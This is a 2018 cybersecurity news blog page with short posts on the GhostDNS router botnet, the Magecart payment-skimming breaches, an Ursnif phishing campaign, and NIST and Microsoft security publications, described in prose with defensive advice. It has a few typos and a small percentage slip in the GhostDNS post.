BLOG

GhostDNS: 100,00 Infected Routers

Several research labs have been releasing their finding on a new take of DNSChanger.  A new router-based exploit known as GhostDNS seems to be made up of three variations of DNSChanger.  By using Shell DNSChanger, Js DNSChanger, and PyPhp DNSChanger, GhostDNS can infect over 70 different router models. However, GhostDNS is more than the sum of its DNSChanger components. Analysts have also identified that it also is made up of a web admin module, a RougeDNS module, and a phishing module. 

GhostDNS scans the internet looking for routers that it can exploit due to vulnerability or weak security by using its scripts to attack poorly secured Web Administration consoles via Shell, Java, Python, PHP to deploy its payload. The primary purpose is to change the devices’ DNS setting to forward traffic to RougeDNS servers. Once this is done the unsuspecting user is redirected to the phishing landing pages of online services when they attempt to go to various web services. Banking portals, Telecom’s, ISP’s and Netflix seem to be among the most common phishing targets of this malware.   

While there has been some disagreement about the time frame this campaign has been running, it is widely agreed the campaign has infected over 100,000 routers with 86% located in Brazil. The other 24% have been reported across other South American countries. The DNS redirection service know as Rouge has been detected on many notable cloud services like Amazon, OVH, Google, Telefonica, and Oracle but researchers have been in contact with larger networks and ISP’s to shut down the network. 

The GhostDNS payload can deliver over 100 scripts via remote access or utilizing exploits, and can attack hardware from older HP (3Com), A-Link, Alcatel / Techicolor, Antena, C3-Tech, Cisco, D-Link, Elsys, Fibrehome, Fiberlink, Geneko, Greatek, Huawei, Intelbras, Kaiomy, LinkOne, MikroTik, MPI Networks, Multilaser, OIWTECH, Perfect, Qtech, Ralink, Roteador, Sapido, Secutech, Siemens, Technic, Tenda, Thomson, TP-Link, Ubiquiti, Viking, ZTE, and Zyxel routers. 
Analysts have some advice to not become a victim this kind of attack. It is recommended that you update your firmware to the latest version available for your router and use complex and strong passwords. Consider disabling any web administration on your device. Finally, hardcode your DNS setting to use only trusted DNS servers in both your Router and OS. 

Sources
https://thehackernews.com/2018/10/ghostdns-botnet-routerhacking.html https://www.theregister.co.uk/2018/10/02/ghostdns_router_hacking/ 
http://blog.netlab.360.com/70-different-types-of-home-routers-alltogether-100000-are-being-hijacked-by-ghostdns-en/ h
Fri, 05 Oct 2018 18:30:00 +0000

Supply Chain Issue

The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies

 
here a great article on Supply chain  on the Bloomberg site. The article is here

Thu, 04 Oct 2018 18:47:00 +0000

Facebook Breach


FTC Issues Alert on Recent Facebook Breach

10/03/2018 01:30 PM EDT

 

Original release date: October 03, 2018

The Federal Trade Commission (FTC) has released an alert to provide Facebook users with recommended precautions against identity theft after the recent breach of the Facebook social media platform.

NCCIC encourages users and administrators to review the FTC Alert and the NCCIC Tip on Preventing and Responding to Identity Theft. If you believe you are a victim of identity theft, visit the FTC’s identity theft websiteto make a report.

Wed, 03 Oct 2018 19:31:00 +0000

2018 NY Metro Joint Cyber Security WEBINAR

October 18th WEBINAR

The 2018 NY Metro Joint Cyber Security WEBINAR will take place on Thursday October 18th. NYMJCSC is now in its fifth year; featuring keynotes, panels and sessions aimed at various aspects of information security and technology.

This year will feature a webinar format allowing NYMJCSC to reach and educate a broader audience.


Time Slot Topic Speaker
2:00 - 2:40 Behavior-based Internal Controls that Prevent Ransomware, Employee Theft, and Denial of Service attacks Jeffrey Wagar
2:45 - 3:25 Cyber Risk: It's All About People Alan Brill
3:30 - 4:10 Cyber Dogfighting: Hacker Decision-Making and the Korean Air War Mathew J. Heath Van Horn
4:15 - 4:55 Assessing Legal and Contractual Risk and Uncertainty with Bug Bounty Programs, Vulnerability Disclosures and Information Sharing Mark H. Francis
4:50 - 5:30 "Not If but When?" - Leveraging AI to Jettison Mantras of the Past: How AI will Liberate Security of the Future John McClurg




Register Here for the Webinar on Thursday, October 18th

Tue, 02 Oct 2018 21:22:00 +0000

Security baseline (DRAFT) for Windows 10 v1809 and Windows Server 2019

icrosoft is pleased to announce the draft release of the security configuration baseline settings for Windows 10 version 1809 (a.k.a., “Redstone 5” or “RS5”), and for Windows Server 2019. Please evaluate these proposed baselines and send us your feedback via blog comments below.

Download the content here: Windows-10-1809-Security-Baseline-DRAFT.zip

The downloadable attachment to this blog post includes importable GPOs, a PowerShell script for applying the GPOs to local policy, custom ADMX files for Group Policy settings, documentation in spreadsheet form and as a Policy Analyzer file (MSFT-Win10-v1809-RS5-WS2019-DRAFT.PolicyRules). In this release, we have changed the documentation layout in a few ways:


Highlights of the differences from past baselines, which are listed in BaselineDiffs-to-v1809-RS5-DRAFT.xlsx:

See the rest of the changes here

Tue, 02 Oct 2018 21:19:00 +0000

NIST final public draft Special Publication 800-37, Revision 2


NIST announces the final public draft Special Publication 800-37, Revision 2Risk Management Framework for Information Systems and Organizations--A System Life Cycle Approach for Security and Privacy.

There are seven major objectives for this update:


The addition of the Prepare step is one of the key changes to the RMF—incorporated to achieve more effective, efficient, and cost-effective security and privacy risk management processes.

In addition to seeking your comments on this final public draft, we are specifically seeking feedback on a new RMF Task P-13, Information Life Cycle. The life cycle describes the stages through which information passes, typically characterized as creation or collection, processing, dissemination, use, storage, and disposition, to include destruction and deletion. Identifying and understanding all stages of the information life cycle have significant implications for security and privacy. We are seeking comment on how organizations would executive this task and how we might provide the most helpful discussion to assist organizations in the execution.  

The public comment periodfor the draft publication is October 2 through October 31. Please submit comments using the comment template to sec-cert@nist.gov.

Tue, 02 Oct 2018 16:13:00 +0000

Great articel about Maleware and Small Businesses

Small businesses targeted by highly localized Ursnif campaign

Cyber thieves are continuously looking for new ways to get people to click on a bad link, open a malicious file, or install a poisoned update in order to steal valuable data. In the past, they cast as wide a net as possible to increase the pool of potential victims. But attacks that create a lot of noise are often easier to spot and stop. Cyber thieves are catching on that we are watching them, so they are trying something different. Now we’re seeing a growing trend of small-scale, localized attacks that use specially crafted social engineering to stay under the radar and compromise more victims.
In social engineering attacks, is less really more?
A new malware campaign puts that to the test by targeting home users and small businesses in specific US cities. This was a focused, highly localized attack that aimed to steal sensitive info from just under 200 targets. Macro-laced documents masqueraded as statements from legitimate businesses. The documents are then distributed via email to target victims in cities where the businesses are located.
With Windows Defender AV’s next gen defense, however, the size of the attack doesn’t really matter.
Several cloud-based machine learning algorithms detected and blocked the malicious documents at the onset, stopping the attack and protecting customers from what would have been the payload, info-stealing malware Ursnif.

TO read the full article on Microsoft site go here

Thu, 27 Sep 2018 14:33:00 +0000

Introducing Microsoft Learn


Microsoft announced a launch more than 80 hours of learning for Azure, Dynamics 365, Power BI, PowerApps, and Microsoft Flow. The new learning platform includes experiences that will help you, your customers, and partners to up-level your skills, prepare for new role-based certification exams, and explore additional training offerings such as instructor-led training and Pluralsight.  Check out www.microsoft.com/learn

Highlights include:

 










Role-based certifications and training

Microsoft introduced new role-based certifications, starting with 3 new roles: Microsoft Certified Azure Developer, Microsoft Certified Azure Administrator and Microsoft Certified Azure Solutions Architect. With additional roles to follow.  The launch of these certifications also includes new exams and updated instructor-led training to prepare for these exams. Learn more: http://aka.ms/RoleBasedCert

 

 

Tue, 25 Sep 2018 21:10:00 +0000

Magecart? Again?

I don’t like writing breach stories because they occur far too often. On the other hand, when the breach is the fault of the sales merchant, one hopes exposure would cause a renewed interest in other merchants to better secure their retail websites to assure such data loss doesn’t happen to them.
With the numbers of breaches so large, how easily we forget that back in June, Magecart applied a kind of cross-site-scripting (XSS) attack to effectively digitally skim the credit card information from Ticketmaster buyers used for payment. In defense of Ticketmaster, the actual attack appeared to be a code insertion compromise against Inbenta, a thirdparty supplier for their website. Although obfuscated, and having no impact on the site’s functionality, the subtle change captured and diverted the information to Magecartowned servers with legitimate looking names.

 This attack was nothing new to Magecart, who’s been behind such malaise since 2015 and focuses on e-commerce. At the time of the Ticketmaster breach, RiskIQ believed that there were over 800 different commerce websites also targeted based on their analysis. Clearly Magecart continued with attacks as evidenced by the large compromise of British Airways (having lost over 380,000 transactions). One might imagine that other smaller sites are also being targeted based on the announcement that just this week ABC-CBN (who’s on-line store was compromised) may have lost information on 213 customers.

You’d think with such publicity, e-commerce sites, especially those with a large customer base would be watching for similar Magecart activity to assure they don’t fall victim. Or not. Per Threatpost yesterday, “Newegg is a top online merchant with tens of millions of registered users in 50 countries, according to its website. It sells a range of consumer electronics, entertainment, smart-home and gaming products, and is the 161st most popular site in the U.S. according to Alexa. In all, it receives more than 50 million site visitors per month. And between Aug. 14 and Sept. 18, a Magecart-linked payment skimmer was active on the Newegg site”. Like the attacks on the other e-commerce sites, with an eloquent injection of only 8 lines of code (similar to the code used in the British Airways incident but improved), Magecart diverted information to a domain with a legitimate Comodo-issued certificate called neweggstats[.]com. In the analysis of these attacks, RiskIQ further states: “Magecart attacks are surging—RiskIQ’s automatic detections of instances of Magecart breaches pings us almost hourly.”

Who’s to blame for these breaches? Clearly web service providers in the e-commerce arena need to improve their approaches to security. How many sites have been compromised? Perhaps there are some we may never know about, but for many more, my guess is we will learn about them in the near future as e-commerce providers take a closer look at their websites for some unauthorized Magecart additions. 
Sources:
 https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/ https://www.computerworlduk.com/security/magecart-who-what-is-behindbritish-airways-attack-3683768/ https://threatpost.com/magecart-strikes-againsiphoning-payment-info-from-newegg/137576/

This article was created by Peraton
Fri, 21 Sep 2018 18:33:00 +0000

Draft Cybersecurity Practice Guide SP 1800-14, Protecting the Integrity of Internet Routing: Border Gateway Protocol (BGP) Route Origin Validation, is Available for Comment


Draft Cybersecurity Practice Guide SP 1800-14, Protecting the Integrity of Internet Routing: Border Gateway Protocol (BGP) Route Origin Validation, is Available for Comment

It is difficult to overstate the importance of the internet to modern business and society in general. The internet is not a single network, but rather a complex grid of independent interconnected networks that relies on a protocol known as Border Gateway Protocol (BGP) to route traffic to its intended destination.

Unfortunately, BGP was not designed with security in mind and a route hijack attack can deny access to internet services, misdeliver traffic to malicious endpoints, and cause routing instability. A technique known as BPG route origin validation (ROV) is designed to protect against route hijacking.

NIST’s National Cybersecurity Center of Excellence (NCCoE), together with several technology vendors, has developed proof-of-concept demonstrations of BGP ROV implementation designed to improve the security of the internet's routing infrastructure. 

Comments for this draft are due by October 15, 2018. To review Draft Special Publication (SP) 1800-14, and for information on submitting comments, please visit the links below.

CSRC Update: https://csrc.nist.gov/news/2018/nist-requests-comments-on-draft-sp-1800-14 
Publication details: https://csrc.nist.gov/publications/detail/sp/1800-14/draft 
Project Homepage: https://www.nccoe.nist.gov/projects/building-blocks/secure-inter-domain-routing 

Sat, 15 Sep 2018 15:59:00 +0000